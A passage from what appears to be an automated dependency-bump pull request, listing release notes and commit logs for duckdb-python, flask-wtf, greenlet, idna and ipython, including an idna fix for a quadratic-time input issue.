href=\"https://github.com/duckdb/duckdb-python/commit/97df04987ffd69a0c5a94b4e8802b78c0302023e\"\u003e\u003ccode\u003e97df049\u003c/code\u003e\u003c/a\u003e fix .clangd\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/fd8889e3024da05d7afe90f4e20d6b9bd2b3e9c0\"\u003e\u003ccode\u003efd8889e\u003c/code\u003e\u003c/a\u003e Use recursive mutex to deal with GIL \u0026lt;-\u0026gt; internal lock deadlocks (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/462\"\u003e#462\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/7b77328d1bbcf1a95726c332a47eb8ca817222c4\"\u003e\u003ccode\u003e7b77328\u003c/code\u003e\u003c/a\u003e [duckdb-labs bot] Bump DuckDB submodule (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/464\"\u003e#464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/9a866338302f8b7d31acde303cec9e3238cb2874\"\u003e\u003ccode\u003e9a86633\u003c/code\u003e\u003c/a\u003e Fix concjunction OR (\u003ca href=\"https://redirect.github.com/duckdb/duckdb-python/issues/465\"\u003e#465\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/duckdb/duckdb-python/commit/3d778deea42aab1eccce0693538805b9d6183b44\"\u003e\u003ccode\u003e3d778de\u003c/code\u003e\u003c/a\u003e Fix concjunction OR\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/duckdb/duckdb-python/compare/v1.5.2...v1.5.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask-wtf` from 1.2.2 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets-eco/flask-wtf/releases\"\u003eflask-wtf's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epre-commit autoupdate by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/607\"\u003epallets-eco/flask-wtf#607\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eremove slsa provenance by \u003ca href=\"https://github.com/davidism\"\u003e\u003ccode\u003e@​davidism\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/638\"\u003epallets-eco/flask-wtf#638\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport for Python 3.14 by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/648\"\u003epallets-eco/flask-wtf#648\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTry not to read uploaded files into memory by \u003ca href=\"https://github.com/Zverik\"\u003e\u003ccode\u003e@​Zverik\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/635\"\u003epallets-eco/flask-wtf#635\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigrate the project to uv by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/649\"\u003epallets-eco/flask-wtf#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReCaptcha field testing mode documentation by \u003ca href=\"https://github.com/OmeirP\"\u003e\u003ccode\u003e@​OmeirP\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/650\"\u003epallets-eco/flask-wtf#650\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow nonce in reCaptcha by \u003ca href=\"https://github.com/kesara\"\u003e\u003ccode\u003e@​kesara\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/312\"\u003epallets-eco/flask-wtf#312\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCSRF meta tag helper by \u003ca href=\"https://github.com/azmeuk\"\u003e\u003ccode\u003e@​azmeuk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/674\"\u003epallets-eco/flask-wtf#674\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ewidget support the kwargs to add custom html attributes by \u003ca href=\"https://github.com/thivolle-cazat-cedric\"\u003e\u003ccode\u003e@​thivolle-cazat-cedric\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/353\"\u003epallets-eco/flask-wtf#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRespect exempts in CSRFProtect.protect() by \u003ca href=\"https://github.com/rauchy\"\u003e\u003ccode\u003e@​rauchy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/419\"\u003epallets-eco/flask-wtf#419\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdding RECAPTCHA_ENABLE to disable recaptcha by \u003ca href=\"https://github.com/rnt\"\u003e\u003ccode\u003e@​rnt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/509\"\u003epallets-eco/flask-wtf#509\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove CSRF Documentation by \u003ca href=\"https://github.com/israel-oye\"\u003e\u003ccode\u003e@​israel-oye\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/584\"\u003epallets-eco/flask-wtf#584\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Zverik\"\u003e\u003ccode\u003e@​Zverik\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/635\"\u003epallets-eco/flask-wtf#635\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/OmeirP\"\u003e\u003ccode\u003e@​OmeirP\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/650\"\u003epallets-eco/flask-wtf#650\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kesara\"\u003e\u003ccode\u003e@​kesara\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/312\"\u003epallets-eco/flask-wtf#312\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thivolle-cazat-cedric\"\u003e\u003ccode\u003e@​thivolle-cazat-cedric\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/353\"\u003epallets-eco/flask-wtf#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rauchy\"\u003e\u003ccode\u003e@​rauchy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/419\"\u003epallets-eco/flask-wtf#419\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rnt\"\u003e\u003ccode\u003e@​rnt\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/509\"\u003epallets-eco/flask-wtf#509\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/israel-oye\"\u003e\u003ccode\u003e@​israel-oye\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/pull/584\"\u003epallets-eco/flask-wtf#584\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pallets-eco/flask-wtf/compare/v1.2.2...v1.3.0\"\u003ehttps://github.com/pallets-eco/flask-wtf/compare/v1.2.2...v1.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets-eco/flask-wtf/blob/main/docs/changes.rst\"\u003eflask-wtf's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 1.3.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-04-23\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDon't read the whole uploaded files to know their size. :pr:\u003ccode\u003e635\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eStop support for Python 3.9. Start support for Python 3.14. :pr:\u003ccode\u003e648\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMigrate the project to uv. :pr:\u003ccode\u003e649\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAllow setting a \u003ccode\u003enonce\u003c/code\u003e on :class:\u003ccode\u003e~flask_wtf.recaptcha.RecaptchaField\u003c/code\u003e\n(string or zero-argument callable) for nonce-based Content Security\nPolicies. :pr:\u003ccode\u003e312\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003ecsrf_meta_tag()\u003c/code\u003e helper and \u003ccode\u003eWTF_CSRF_META_NAME\u003c/code\u003e setting to render\nthe CSRF token as an HTML \u003ccode\u003e\u0026lt;meta\u0026gt;\u003c/code\u003e tag.\u003c/li\u003e\n\u003cli\u003eForward keyword arguments passed to the reCAPTCHA widget as HTML attributes\non the captcha \u003ccode\u003e\u0026lt;div\u0026gt;\u003c/code\u003e, with the field id used as a default \u003ccode\u003eid\u003c/code\u003e.\n:pr:\u003ccode\u003e353\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eapply_exemptions\u003c/code\u003e parameter to\n:meth:\u003ccode\u003e~flask_wtf.csrf.CSRFProtect.protect\u003c/code\u003e so \u003ccode\u003e@csrf.exempt\u003c/code\u003e keeps working\nwhen validation is triggered manually. :pr:\u003ccode\u003e419\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eRECAPTCHA_ENABLED\u003c/code\u003e setting. :pr:\u003ccode\u003e509\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/63eb4d3bd55735fc136bdc6f23a90ca2b220b602\"\u003e\u003ccode\u003e63eb4d3\u003c/code\u003e\u003c/a\u003e chore: bump to v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/192ece3da0d98682c13e12574d7b1fc938bdd8e8\"\u003e\u003ccode\u003e192ece3\u003c/code\u003e\u003c/a\u003e Improve CSRF Documentation (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/584\"\u003e#584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/1f8522d4a362ee66ab12a1ebf55379501dfcef0d\"\u003e\u003ccode\u003e1f8522d\u003c/code\u003e\u003c/a\u003e Adding RECAPTCHA_ENABLE to disable recaptcha (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/509\"\u003e#509\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/64b9215be16dc123f7eb187494dbba6bd0e5c2cd\"\u003e\u003ccode\u003e64b9215\u003c/code\u003e\u003c/a\u003e Respect exempts in CSRFProtect.protect() (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/419\"\u003e#419\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/adf674f80c5c5e55c050729e3ec086b4d6cb0f26\"\u003e\u003ccode\u003eadf674f\u003c/code\u003e\u003c/a\u003e widget support the kwargs to add custom html attributes (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/353\"\u003e#353\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/ea1f797112f857c783dcd2c6e3954357df8e1bb7\"\u003e\u003ccode\u003eea1f797\u003c/code\u003e\u003c/a\u003e feat: CSRF meta tag helper (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/674\"\u003e#674\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/412e3efda3703b141ca75afbcbf0538a7797b713\"\u003e\u003ccode\u003e412e3ef\u003c/code\u003e\u003c/a\u003e Allow nonce in reCaptcha (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/312\"\u003e#312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/a7b764a1fa8f4ea960d81104c364a2d29429e1b8\"\u003e\u003ccode\u003ea7b764a\u003c/code\u003e\u003c/a\u003e ReCaptcha field testing mode documentation (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/c053c0ec11560e68e558636962bbec1115a7ae2a\"\u003e\u003ccode\u003ec053c0e\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump pytest from 9.0.1 to 9.0.3 (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/673\"\u003e#673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets-eco/flask-wtf/commit/ca2216cdf72717aa3c2355ba5f454080c78d9273\"\u003e\u003ccode\u003eca2216c\u003c/code\u003e\u003c/a\u003e chore(deps): bump uv from 0.9.11 to 0.11.6 (\u003ca href=\"https://redirect.github.com/pallets-eco/flask-wtf/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets-eco/flask-wtf/compare/v1.2.2...v1.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `greenlet` from 3.3.2 to 3.5.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-greenlet/greenlet/blob/master/CHANGES.rst\"\u003egreenlet's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e3.5.1 (2026-05-20)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdd preliminary support for Python 3.15b1. This has not been\nreviewed by CPython core developers, but all tests pass. Binary\nwheels of this version won't work on earlier Python 3.15 builds and\nmay not work on later 3.15 builds.\u003c/li\u003e\n\u003cli\u003eFix the discrepancy in the way the two \u003ccode\u003egetcurrent\u003c/code\u003e APIs behave\nduring greenlet teardown. One API (the C API used by, e.g.,  gevent) raised a\n\u003ccode\u003eRuntimeError\u003c/code\u003e; the other (the Python \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e API)\nreturned \u003ccode\u003eNone\u003c/code\u003e. This second way is incompatible with greenlet's type\nannotations, so \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e now raises a\n\u003ccode\u003eRuntimeError\u003c/code\u003e as well.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e3.5.0 (2026-04-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRemove the \u003ccode\u003eatexit\u003c/code\u003e callback. This callback caused greenlet APIs\nto become unavailable far too soon during interpreter shutdown. Now\nthey remain available while all \u003ccode\u003eatexit\u003c/code\u003e callbacks run. Sometime\nafter \u003ccode\u003ePy_IsFinalizing\u003c/code\u003e becomes true, they may begin misbehaving.\nBecause the order in which C extensions are finalized is undefined,\nC extensions that are sensitive to this need to check the results of\nthat function before invoking greenlet APIs. As a convenience,\n\u003ccode\u003ePyGreenlet_GetCurrent\u003c/code\u003e sets an exception and returns \u003ccode\u003eNULL\u003c/code\u003e\nwhen this happens (and \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e begins returning\n\u003ccode\u003eNone\u003c/code\u003e); other greenlet C API functions have undefined behaviour.\nMethods invoked directly on pre-existing \u003ccode\u003egreenlet.greenlet\u003c/code\u003e\nobjects will continue to function at least until the greenlet C\nextension has been garbage collected and finalized.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003ePR 508 \u0026lt;https://github.com/python-greenlet/greenlet/pull/508\u0026gt;\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e3.4.0 (2026-04-08)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ePublish binary wheels for RiscV 64.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix multiple rare crash paths during interpreter shutdown.\u003c/p\u003e\n\u003cp\u003eNote that this now relies on the \u003ccode\u003eatexit\u003c/code\u003e module, and introduces\nsubtle API changes during interpreter shutdown (for example,\n\u003ccode\u003egetcurrent\u003c/code\u003e is no longer available once the \u003ccode\u003eatexit\u003c/code\u003e callback fires).\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003ePR [#499](https://github.com/python-greenlet/greenlet/issues/499) \u0026lt;https://github.com/python-greenlet/greenlet/pull/499\u0026gt;\u003c/code\u003e_ by Nicolas\nBouvrette.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAddress the results of an automated code audit performed by\nDaniel Diniz. This includes several minor correctness changes that\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/b5e5fc43a51c27ecffa1b1c7107c91464a6b26e2\"\u003e\u003ccode\u003eb5e5fc4\u003c/code\u003e\u003c/a\u003e Preparing release 3.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/c8e177413d34bc36ed56d2c185c232ab0538be90\"\u003e\u003ccode\u003ec8e1774\u003c/code\u003e\u003c/a\u003e Tweak wording in CHANGES about greenlet.getcurrent.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/7fb10c570f37b3eb4c8909c6164fdfac3269ddb6\"\u003e\u003ccode\u003e7fb10c5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/510\"\u003e#510\u003c/a\u003e from python-greenlet/315\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/9718ce5a23ea3360232b78a806a837d6c3d6183d\"\u003e\u003ccode\u003e9718ce5\u003c/code\u003e\u003c/a\u003e Add Py 3.15; make both API versions of getcurrent() consistent in raising Run...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/276e08afc4ddba87e4366390e3eeaecd61ccb3b8\"\u003e\u003ccode\u003e276e08a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/509\"\u003e#509\u003c/a\u003e from python-greenlet/dependabot/github_actions/github...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/32b0ad69828eb69d879c70dbee948e685268901b\"\u003e\u003ccode\u003e32b0ad6\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish in the github-actions group\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/173b692dc84288ef41572612ac744754f98eaa90\"\u003e\u003ccode\u003e173b692\u003c/code\u003e\u003c/a\u003e Back to development: 3.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/c7acc72000572811d6462ebe01733a974f194990\"\u003e\u003ccode\u003ec7acc72\u003c/code\u003e\u003c/a\u003e Preparing release 3.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/d08f99bf40801c5d57af6e13631c0ba68300ecf7\"\u003e\u003ccode\u003ed08f99b\u003c/code\u003e\u003c/a\u003e CHANGES: Update link from \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/507\"\u003e#507\u003c/a\u003e to more full description in \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/508\"\u003e#508\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/fd3391e33cedc7a17a86059f18dfbec2b3a320bd\"\u003e\u003ccode\u003efd3391e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/508\"\u003e#508\u003c/a\u003e from python-greenlet/issue507-remove-atexit\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-greenlet/greenlet/compare/3.3.2...3.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.11 to 3.17\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.15 (2026-05-12)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnforce DNS-length cap on individual labels early in \u003ccode\u003echeck_label\u003c/code\u003e,\nshort-circuiting contextual-rule processing for oversized input\nwhile staying compatible with UTS 46 usage.\u003c/li\u003e\n\u003cli\u003eTidy core helpers: hoist bidi category sets to module-level\nfrozensets (avoiding per-codepoint list construction), simplify\nlength checks, and reuse the shared \u003ccode\u003e_unicode_dots_re\u003c/code\u003e from\n\u003ccode\u003eidna.core\u003c/code\u003e in the codec module.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eraise ... from err\u003c/code\u003e for proper exception chaining and\nswitch internal string formatting to f-strings.\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003eflit_core\u003c/code\u003e 4.x in the build backend.\u003c/li\u003e\n\u003cli\u003eExpand the ruff lint set (flake8-bugbear, flake8-simplify,\npyupgrade, perflint) and apply the surfaced fixes; pin lint CI\nto Python 3.14.\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration for GitHub Actions.\u003c/li\u003e\n\u003cli\u003eConvert README and HISTORY from reStructuredText to Markdown.\u003c/li\u003e\n\u003cli\u003eReference CVE-2026-45409 for the 3.14 advisory in place of the\ninitial GHSA identifier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Felix Yan, Stan Ulbrych, and metsw24-max for\ncontributions to this release.\u003c/p\u003e\n\u003ch2\u003e3.14 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved opportunity to process long inputs into quadratic\ntime by rejecting oversize inputs up-front. Closes a bypass\nof the CVE-2024-3651 mitigation. [CVE-2026-45409]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Stan Ulbrych for reporting the issue.\u003c/p\u003e\n\u003ch2\u003e3.13 (2026-04-22)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/354eee9850a7b2962b65ae02010f7ebd9c99b7ed\"\u003e\u003ccode\u003e354eee9\u003c/code\u003e\u003c/a\u003e Apply ruff format to uts46data.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/8c34ffcab603b4a7a727d4e286b1f3342813281d\"\u003e\u003ccode\u003e8c34ffc\u003c/code\u003e\u003c/a\u003e Refactor uts46data into parallel arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1189629e8a319f7c2b4678b5716c180ebd97de03\"\u003e\u003ccode\u003e1189629\u003c/code\u003e\u003c/a\u003e Range-encode joining_types for compact representation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f90b87adc6b6b2a591dfc7fb3f8e47870dc81722\"\u003e\u003ccode\u003ef90b87a\u003c/code\u003e\u003c/a\u003e Generic length limit for functions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d6ffd28be164dfbd3ebca8b3396e39d191f4909b\"\u003e\u003ccode\u003ed6ffd28\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/247\"\u003e#247\u003c/a\u003e from kjd/release-3.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/6d1a0de52a8b4690f1b2a89829aa85ff1de3635a\"\u003e\u003ccode\u003e6d1a0de\u003c/code\u003e\u003c/a\u003e Release 3.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.11...v3.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ipython` from 9.12.0 to 9.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/9d1f24b9687279362b66f4e8c8a36ffde895a05d\"\u003e\u003ccode\u003e9d1f24b\u003c/code\u003e\u003c/a\u003e release 9.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca 